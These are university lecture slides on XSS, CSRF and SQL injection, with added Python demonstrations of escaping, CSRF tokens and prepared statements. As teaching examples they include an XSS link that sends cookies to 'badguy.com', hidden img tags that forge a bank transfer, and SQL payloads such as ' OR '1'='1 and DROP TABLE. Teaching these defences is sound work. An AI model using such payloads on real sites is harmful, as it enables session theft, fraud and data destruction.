CSCD 303 Essential Computer Security Fall 2018


Lecture 17: XSS, SQL Injection and CSRF
Reading: See links at the end of the slides

Overview
The idea of XSS, CSRF and SQL injection is to violate the security of the web browser/server system:
- Inject content into web pages that tricks users, or
- Inject content into web pages that tricks web servers
The result is stolen resources or destruction of information.

Web Based Attacks

Application Layer
[Diagram: application attack. Application layer: Finance, Accounts, Transactions, Administration, E-Commerce, Knowledge Mgmt, Communication, Bus. Functions; Custom Code; App Server, Web Server; Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing. Network layer: Firewall, Hardened OS, Firewall, Insider.]
- Attacker sends attacks inside valid HTTP requests
- Your code is tricked into doing something it should not
- Security requires software development expertise
- Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests

Types of Web Attacks
What kinds of web attacks are popular? Those that exploit inadequate validation of user input. The named attacks below:
- Cross-site scripting, XSS
- Cross-site request forgery, CSRF
- SQL injection

Cross-site Scripting (XSS)
- Cross-site scripting (XSS) is a computer security vulnerability found in web applications
- It allows code injection by malicious web users into web pages viewed by other users
- Examples of such code include HTML code and client-side scripts
- An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy for scripts
- As of 2017, cross-site scripting is among the top 10 web site problems: https://www.owasp.org/index.php/category:owasp_top_ten_2017_project

Same Origin Policy
- The intent is to let users visit untrusted web sites without those web sites interfering with the user's session with honest web sites
- The same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin
- Two pages have the same origin if the protocol, port (if one is specified), and host are the same for both pages
  http://www.w3.org/security/wiki/same_origin_policy

Outcome of access from a document served from http://store.company.com (default port):

  URL                                            Outcome   Reason
  http://store.company.com/dir2/other.html       Success
  http://store.company.com/dir/inner/another.html Success
  https://store.company.com/secure.html          Failure   Different protocol
  http://store.company.com:81/dir/etc.html       Failure   Different port
  http://news.company.com/dir/other.html         Failure   Different host
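The origin comparison behind the table, written out as an added example (not code from the slides): two URLs share an origin only when scheme, host and effective port agree, and the path is ignored. The base document is assumed to be http://store.company.com/dir/page.html, since the slide's table omits it.

```python
from urllib.parse import urlsplit

# Ports a browser assumes when the URL omits one (assumption: only http/https matter here).
DEFAULT_PORTS = {"http": 80, "https": 443}

# Assumed base document; the slide's table does not state it.
BASE_URL = "http://store.company.com/dir/page.html"

def origin(url):
    """Return the (scheme, host, port) triple that defines a URL's origin.
    Host and scheme are case-insensitive; a missing port falls back to the scheme default."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)

def same_origin(url_a, url_b):
    """True when both URLs have identical origins; the path component never matters."""
    return origin(url_a) == origin(url_b)

def explain(base, other):
    """Reproduce the slide's Outcome/Reason columns for one candidate URL."""
    a, b = origin(base), origin(other)
    if a == b:
        return "Success"
    if a[0] != b[0]:
        return "Failure: different protocol"
    if a[2] != b[2]:
        return "Failure: different port"
    return "Failure: different host"

if __name__ == "__main__":
    for candidate in (
        "http://store.company.com/dir2/other.html",
        "http://store.company.com/dir/inner/another.html",
        "https://store.company.com/secure.html",
        "http://store.company.com:81/dir/etc.html",
        "http://news.company.com/dir/other.html",
    ):
        print(f"{candidate:50} {explain(BASE_URL, candidate)}")
```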

Example Websites XSS'd
- A hacker was able to insert JavaScript code into the Obama community blog section; the JavaScript would redirect users to the Hillary Clinton website
  http://www.youtube.com/watch?v=pas7kcgjkew
  http://www.crn.com/news/security/207401353/obama-website-hacked-users-redirected-to-clinton-campaign.htm
- Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple Computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs
- List of websites with XSS: http://www.xssed.com/archive
- Example of an XSS attack: http://www.acunetix.com/websitesecurity/xss/

Cross Site Scripting (XSS)
Recall:
- Scripts embedded in web pages run in browsers
- Scripts can access cookies: get private information
- Scripts can manipulate page objects: control what users see
- Scripts are controlled by the same-origin policy
How could XSS occur? Web applications often take user inputs and use them as part of the web page.

Cross-Site Scripting (XSS) Attacks

XSS Example
User input is echoed into the HTML response. Example: a search field
  http://victim.com/search.php?term=apple
search.php responds with this page:
  <HTML>
  <TITLE> Search Results </TITLE>
  <BODY>
  Results for <?php echo $_GET['term'] ?> :...
  </BODY>
  </HTML>
Is this exploitable?

XSS Example: Attacker's Bad Input
Problem: no validation of the input term. Consider this link:
  http://victim.com/search.php?term=<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>
What if the user clicks on this link?
1. Browser goes to victim.com/search.php
2. victim.com returns
   <HTML> Results for <script> ... </script>
3. Browser executes the script: sends badguy.com the cookie for victim.com

More Details of XSS
Why would a user click on such a link?
- Phishing email in a webmail client (e.g. Gmail)
- Link in a DoubleClick banner ad
- Many, many ways to fool a user into clicking
What if badguy.com gets the cookie for victim.com?
- The cookie can include session authentication for victim.com, or other data intended only for victim.com
- This violates the same-origin policy
Let's see another picture of this with more details: https://excess-xss.com/

Consequences of XSS Attacks
- XSS can cause problems for the end user that range from annoyance to complete account compromise
- The most severe XSS attacks involve disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account
- Other results include disclosure of end-user files, installation of Trojan horse programs, redirecting the user to some other page or site, or modifying the presentation of content

XSS Examples
More examples for your viewing pleasure. Good link below with many cut-and-paste opportunities to try this out. A complete how-to for XSS:
  https://www.owasp.org/index.php/cross-site_scripting_%28xss%29

Preventing XSS
- Escape all user input when it is displayed
- Escaping converts the output to harmless HTML entities: <script> becomes &lt;script&gt; but is still displayed as <script>
- Methods: OWASP ESAPI; Java Standard Tag Library (JSTL) <c:out/>
- OWASP XSS Prevention Cheat Sheet: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
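The search.php example from slides 11 and 12 alongside its escaped form, as an added example (not code from the slides or from OWASP): the vulnerable renderer echoes the term verbatim, the fixed one entity-encodes it, and the decoded text shows the user still sees the literal characters. The payload string is constructed from the slide's example link.

```python
import html

# Constructed attacker input: the payload from the slide's example link.
ATTACK_TERM = '<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>'

def render_search_unsafe(term):
    """Mirrors search.php on the slide: the raw term is echoed into the HTML body."""
    return ("<HTML><TITLE>Search Results</TITLE><BODY>"
            f"Results for {term} :...</BODY></HTML>")

def render_search_escaped(term):
    """Escape before echoing: <, >, &, and quotes become HTML entities, so the
    browser renders them as text instead of parsing them as markup."""
    safe = html.escape(term, quote=True)
    return ("<HTML><TITLE>Search Results</TITLE><BODY>"
            f"Results for {safe} :...</BODY></HTML>")

def contains_script_element(page):
    """Crude check for the one thing this example cares about: a parseable <script> tag."""
    return "<script" in page.lower()

def displayed_text(escaped_fragment):
    """What the user sees: the browser decodes the entities back to the literal characters."""
    return html.unescape(escaped_fragment)

if __name__ == "__main__":
    print(render_search_unsafe(ATTACK_TERM))
    print(render_search_escaped(ATTACK_TERM))
    print(displayed_text(html.escape(ATTACK_TERM, quote=True)))
```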

Preventing XSS
- Security expert coding recommendations: http://www.jtmelton.com/tag/cross-site-scripting/
- .NET: use the Microsoft Anti-XSS Library: http://msdn.microsoft.com/en-us/security/aa973814.aspx

XSS Prevention: NoScript Firefox Add-on
- NoScript: JavaScript, Java, Flash, Silverlight and possibly other executable content are blocked by default
- You will be able to allow JavaScript/Java/... execution (scripts from now on) selectively, on the sites you trust
- Must first enable JavaScript in Firefox
  http://noscript.net/features

Cross Site Request Forgery (CSRF)

What is Cross Site Request Forgery?
- Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request
- It is malicious in that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf: change the victim's e-mail address, change the home address, change the password, or purchase something

[Diagram: application with a CSRF vulnerability (Accounts, Finance, Administration, Transactions, E-Commerce, Knowledge Mgmt, Communication, Bus. Functions; Custom Code).]
1. Attacker sets the trap on some website on the Internet (or simply via an e-mail); a hidden <img> tag contains the attack against the vulnerable site
2. While logged into the vulnerable site, the victim views the attacker's site; the <img> tag loaded by the browser sends a GET request (including credentials) to the vulnerable site
3. The vulnerable site sees a legitimate request from the victim and performs the action requested

Cross Site Request Forgery (CSRF)
- Cross Site Request Forgery, also XSRF or Cross Site Reference Forgery
- Works by exploiting the trust of a site for the user
- In the case of XSS, the user is the victim; in the case of CSRF, the user is an accomplice
- Example: http://site/stocks?buy=100&stock=ebay allows specific actions to be performed when requested
- If a user is logged into the site and an attacker tricks their browser into making a request to one of these task URLs, then the task is performed for the logged-in user, but the user didn't intend to do it

Dangers of CSRF
Most of the functionality allowed by a website can be performed by an attacker utilizing CSRF. What does this mean for victims? This could include posting content to a message board, subscribing to an online newsletter, performing stock trades, using a shopping cart, or even sending an e-card.

CSRF: More Details
- The most popular ways to execute CSRF attacks use the HTML image tag or the JavaScript Image object
- An attacker will embed these into an email or website so that when the user loads the page or email, they perform a web request to any URL of the attacker's liking
- Examples follow

CSRF Code Examples
HTML methods:
  IMG SRC     <img src="http://host/?command">
  SCRIPT SRC  <script src="http://host/?command"></script>
  IFRAME SRC  <iframe src="http://host/?command"></iframe>
JavaScript methods ('Image' object):
  <script>
    var foo = new Image();
    foo.src = "http://host/?command";
  </script>

CSRF Example Detailed
Say an online banking site performs a transfer-of-funds action by calling a URL such as:
  http://bigsafebank.com/transfer.do?acct=attacker&amount=1000
This URL will transfer $1000 from a victim's account into the attacker's account if the victim is logged into their account on the BigSafeBank website.

CSRF Example Detailed
The attacker must fool the victim into clicking the link and executing the malicious action. The attacker can create an HTML email with a tag such as:
  <img src="http://bigsafebank.com/transfer.do?acct=attacker&amount=1000" width="1" height="1" border="0">
When a victim views this HTML email, they will see an error indicating that the image could not be loaded, but the browser still submits the transfer request to bigsafebank.com without requiring any further interaction from the user.

CSRF Example Detailed
The crazy part is: even though the image was rendered unsuccessfully, using the <img> tag an automatic HTTP request was made that contained the victim's credentials, i.e. the session cookie, allowing the server to perform the malicious action.

CSRF: Why Does it Happen
A web application's vulnerability to CSRF is due to the following conditions:
- Use of certain HTML tags will result in automatic HTTP request execution
- Our browsers have no way of telling if a resource referenced by an <img> tag is a legitimate image
- Loading of an image will happen regardless of where that image is located

CSRF: Why Does it Happen
More reasons why:
- Code within the web application performs security-sensitive operations in response to requests without validation of the user
- GET requests are especially vulnerable to this type of attack, but POST requests are not immune

Fixing CSRF with CSRF Guard
http://www.owasp.org/index.php/how_csrfguard_works
- The Open Web Application Security Project (OWASP) has a tool, CSRF Guard, that implements a session token to thwart CSRF attacks
- When the user first visits the site, the application will generate and store a session-specific token
- This session-specific token is then placed in each form and link of the HTML response, ensuring that this value will be submitted with the next request
- For each subsequent request, the application must verify the existence of the unique token parameter and compare its value to that of the value stored in the user's session
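The session-token check described above, applied to the bigsafebank.com transfer example, as an added illustration (not OWASP CSRFGuard's own code). The session store, the form renderer and the handler names are assumptions; the forged <img> request from the earlier slides arrives as a GET with no token, so it is rejected before any transfer happens.

```python
import hmac
import secrets

def new_session(user):
    """First visit: create the session and store a random, session-specific token in it."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}

def render_transfer_form(session):
    """Place the session's token in the form as a hidden field so that a legitimate
    submission from the site's own page carries it back with the request."""
    return (
        '<form method="POST" action="/transfer.do">'
        f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'
        '<input name="acct"><input name="amount"><input type="submit" value="Transfer">'
        "</form>"
    )

def handle_transfer(session, method, params):
    """Server-side gate for transfer.do. State changes are POST-only, and the submitted
    token must be present and equal to the one stored in the user's session.
    compare_digest keeps the comparison constant-time."""
    if method != "POST":
        return "rejected: state-changing action must use POST"
    submitted = params.get("csrf_token")
    if submitted is None or not hmac.compare_digest(submitted, session["csrf_token"]):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {params['amount']} to {params['acct']}"

if __name__ == "__main__":
    session = new_session("victim")
    # What the hidden <img> tag from the attacker's email produces: a bare GET, no token.
    print(handle_transfer(session, "GET", {"acct": "attacker", "amount": "1000"}))
    # A submission of the site's own form, carrying the session token.
    print(handle_transfer(session, "POST",
                          {"acct": "savings", "amount": "50", "csrf_token": session["csrf_token"]}))
```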

SQL Injection

SQL Injection
- Very common vulnerability (~71 attacks/hour)
- Exploits web databases that poorly validate user input for SQL string-literal escape characters, e.g. ', or that do not have strongly screened user input
- Example:
    "SELECT * FROM users WHERE name = '" + username + "';"
  If username is set to ' or '1'='1, the resulting SQL is
    SELECT * FROM users WHERE name = '' OR '1'='1';
  This evaluates to SELECT * FROM users and displays all users

SQL Injection Example
Select statement:
  "SELECT * FROM userinfo WHERE id = " + a_variable + ";"
If the programmer doesn't check that a_variable is a number, the attacker can set
  a_variable = 1; DROP TABLE users
and the SQL evaluates to
  SELECT * FROM userinfo WHERE id=1; DROP TABLE users;
Result of this query? The users table is deleted.

Impact of SQL Injection: Dangerous
- At best, you can leak information
- Depending on your configuration, a hacker can delete, alter or create data; grant direct access to the hacker; escalate privileges and even take over the OS

Preventing SQL Injection
- Use prepared statements. Instead of building the query by concatenation,
    $id = 1234
    "select * from accounts where id = " + $id
  bind $id as a parameter, which is safer and more exact: the value is passed to the database as a value rather than as query text, so the query that runs is
    select * from accounts where id = 1234
- Validate input: strong typing (if the id parameter is a number, try parsing it into an integer); business logic validation
- Escape questionable characters: ticks, --, semicolons, brackets
- OWASP cheat sheet: https://www.owasp.org/index.php/sql_injection_prevention_cheat_sheet
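The two injection cases from the previous slides run against the prevention methods from this one, as an added example (not code from the slides): string concatenation returns every row for the ' OR '1'='1 input, the parameterised query treats the same input as a name and matches nothing, and the integer check refuses the 1; DROP TABLE users value before it reaches the database. The users table and its rows are constructed for the demonstration.

```python
import sqlite3

def make_db():
    """Constructed in-memory users table with three sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)",
                     [("alice",), ("bob",), ("carol",)])
    return conn

def find_user_unsafe(conn, username):
    """The slide's vulnerable pattern: the string literal is built by concatenation,
    so quote characters in the input change the structure of the query."""
    sql = "SELECT * FROM users WHERE name = '" + username + "'"
    return conn.execute(sql).fetchall()

def find_user_prepared(conn, username):
    """Prepared statement: the value is bound to the placeholder and is never
    parsed as SQL, whatever characters it contains."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (username,)).fetchall()

def find_by_id_typed(conn, id_param):
    """Strong typing: parse the id into an integer first, then bind it. Anything that
    is not a plain number (such as a trailing statement) is rejected up front."""
    try:
        user_id = int(id_param)
    except ValueError:
        raise ValueError("id must be a number") from None
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

def user_count(conn):
    """Used to confirm the table is still intact after the checks."""
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    print(find_user_unsafe(db, "' OR '1'='1"))     # every row leaks
    print(find_user_prepared(db, "' OR '1'='1"))   # []: no user has that name
    print(find_by_id_typed(db, "2"))               # [(2, 'bob')]
```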

Summary
- Experts suggest the Internet security model is completely flawed, made worse by Web 2.0
- As developers, we can at least ensure our code is not broken
- As users, we have far less control: browser security!!!!

References: CSRF Links
- CGI FAQ on Cross Site Request Forgery (CSRF): http://www.cgisecurity.com/articles/csrf-faq.shtml
- Art of Software Security Assessment, Same Origin: http://taossa.com/index.php/2007/02/08/same-origin-policy/
- OWASP CSRF site: http://www.owasp.org/index.php/csrf
- MSDN article, CSRF explained: http://msdn.microsoft.com/en-us/testing/cc664492.aspx
- Wikipedia: http://en.wikipedia.org/wiki/crosssite_request_forgery

References: XSS
- http://www.cgisecurity.com/articles/xss-faq.shtml
- http://sandsprite.com/sleuth/papers/realworld_xss_1.html
- http://msdn.microsoft.com/en-us/testing/cc664492.aspx
- http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

References: SQL Injection
- SQL Injection Cheat Sheet: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
- SQL Prevention: http://www.marcofolio.net/features/how_you_can_prevent_an_sql_injection.html
- SQL Attacks from UnixWiz: http://www.unixwiz.net/techtips/sql-injection.html
- OWASP SQL Injection: https://www.owasp.org/index.php/sql_injection_prevention_cheat_sheet

End
Lab this week: XSS, CSRF and SQL Injection